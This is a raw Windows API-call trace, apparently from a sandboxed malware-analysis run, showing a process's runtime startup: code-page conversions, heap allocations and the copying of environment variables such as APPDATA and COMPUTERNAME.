\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿvÅ8Àäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0102.472] GetLastError () returned 0x0 [0102.472] SetLastError (dwErrCode=0x0) [0102.472] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.472] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0102.472] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.472] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0102.472] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿvÅ8Àäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0102.506] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0102.506] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0102.507] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0102.573] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1f) returned 0x2beb58 [0102.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2beb58, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0102.619] GetLastError () returned 0x0 [0102.619] SetLastError (dwErrCode=0x0) [0102.619] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x4) returned 0x2b1a60 [0102.619] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b1a60) returned 0x4 [0102.619] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b1a60, Size=0x8) returned 0x2b1a60 [0102.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0102.619] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2b) returned 0x2bb460 [0102.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x2bb460, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0102.619] GetLastError () returned 0x0 [0102.619] SetLastError (dwErrCode=0x0) [0102.619] GetLastError () returned 0x0 [0102.619] SetLastError (dwErrCode=0x0) [0102.620] GetLastError () returned 0x0 [0102.620] SetLastError (dwErrCode=0x0) [0102.652] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b1a60) returned 0x8 [0102.652] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b1a60, Size=0xc) returned 0x2c1618 [0102.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0102.652] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x37) returned 0x2c1630 [0102.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2c1630, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0102.652] GetLastError () returned 0x0 [0102.652] SetLastError (dwErrCode=0x0) [0102.652] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1618) returned 0xc [0102.653] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1618, Size=0x10) returned 0x2c1618 [0102.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0102.653] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2b2568 [0102.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2b2568, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.653] GetLastError () returned 0x0 [0102.653] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1618) returned 0x10 [0102.654] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1618, Size=0x14) returned 0x2c1670 [0102.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0102.654] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x31) returned 0x2c1690 [0102.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2c1690, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.654] GetLastError () returned 0x0 [0102.654] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1670) returned 0x14 [0102.655] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1670, Size=0x18) returned 0x2c1670 [0102.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.655] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x18) returned 0x2c16d0 [0102.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x2c16d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.655] GetLastError () returned 0x0 [0102.655] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1670) returned 0x18 [0102.656] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1670, Size=0x1c) returned 0x2c16f0 [0102.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.656] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2bad90 [0102.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x2bad90, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.656] SetLastError (dwErrCode=0x0) [0102.656] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] GetLastError () returned 0x0 [0102.657] SetLastError (dwErrCode=0x0) [0102.657] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x1c [0102.657] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x20) returned 0x2c16f0 [0102.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.658] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x14) returned 0x2c1670 [0102.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x2c1670, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.658] SetLastError (dwErrCode=0x0) [0102.658] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x20 [0102.659] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x24) returned 0x2c16f0 [0102.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.659] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xd) returned 0x2b3220 [0102.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x2b3220, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.659] GetLastError () returned 0x0 [0102.659] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.660] GetLastError () returned 0x0 [0102.660] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x24 [0102.661] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x28) returned 0x2c16f0 [0102.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.661] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1a) returned 0x2beb80 [0102.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x2beb80, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.661] SetLastError (dwErrCode=0x0) [0102.661] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () 